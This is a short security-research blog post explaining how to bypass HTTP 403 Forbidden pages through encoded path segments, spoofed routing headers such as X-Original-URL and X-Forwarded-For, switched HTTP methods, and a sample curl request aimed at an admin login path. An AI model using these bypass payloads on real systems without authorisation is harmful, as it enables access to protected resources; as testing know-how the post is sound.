403 Forbidden Bypass Technique.
Hi, everyone!
My name is Sonu Chaudhary, I’m a security researcher from India. Here, I am sharing how we can bypass 403 Forbidden pages. There are various techniques that we can use during testing !!
What is 403
The HTTP 403 is an HTTP status code meaning access to the requested resource is forbidden. The server understood the request, but will not fulfill it.
Whenever we found 403 Page its means something is inside we just need to bypass it.
There are various techniques to bypass 403 Forbidden but here I discuss the top 4 ways that we can use.
Try Appending {%2e} or {%2f} { /*, /./}after the first slash!
https://www.domain/DB = 403
https://www.domain/%2e/DB =200
https://www.domain/./DB =200
Adding headers to requests module.
Content-Length: 0
X-rewrite-url
X-Original-URL
X-Custom-IP-Authorization
X-Forwarded-For
Change requested method
GET → POST, GET → TRACE, GET → PUT, GET → OPTIONS
USing CURL
curl -i -s -k -X $’GET’ -H $’Host: account.domain.com’ -H $’X-rewrite-url: admin/login’ $’https://account.domain.com/'
Takeaway
I’m sure that a lot of security researchers had already seen their process but this is how I approach for bypassing 403 Forbidden in the vulnerable application.
That’s all for today if you have any suggestions please let me know so that we can coordinate and add something new to the given method.
You can contact me on